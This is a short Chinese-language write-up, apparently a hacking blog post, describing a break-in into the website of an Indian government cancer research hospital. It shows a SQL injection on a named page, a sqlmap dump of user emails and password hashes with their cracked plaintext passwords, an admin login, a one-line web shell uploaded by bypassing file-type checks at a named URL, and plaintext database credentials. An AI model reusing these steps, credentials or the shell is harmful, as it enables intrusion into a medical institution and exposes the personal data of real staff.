目标:

奇塔兰詹国家癌症研究所

印度政府卫生与家庭福利部区域癌症中心

https://cnci.ac.in/index.php

image-20211122173114707

通过谷歌语法,发现这里有传参,测试了下sql注入

https://cnci.ac.in/scientist_id.php/?id=16

image-20211122174227422

然后使用sqlmap脱裤发现一个csv

1
2
3
4
5
6
7
8
id,email,password,username
9,mitraarijit1999@gmail.com,732fafb24ea23a65fb30c8e8bda8fdf6,mitraarijit1999@gmail.com
10,admin@admin.com,9ed2ac50e3dc5d1cef065bc25d866bea,admin


// 放到cmd5解一下
# mitraarijit1999@gmail.com   admincnci123
# admin   cnciadmin123

image-20211122174303027

尝试登陆后台

image-20211122174605134

成功进入

image-20211122174654602

在后台寻找上传点,只能上传PDF,DOC。直接抓包改后缀传个一句话上去,一次连接成功

image-20211122175747669

image-20211122180745063

1
https://cnci.ac.in/bmw_upload/uploads/97-php1.php     # 蚁剑 pass

找一下数据库连接信息

1
find /home -name *conn*

image-20211122175422229

1
2
3
4
$host = "localhost";
$user = "cnciorg_hospital";         
$password = "iLm!j}v0sd@s"; 
$database = "cnciorg_yzentech";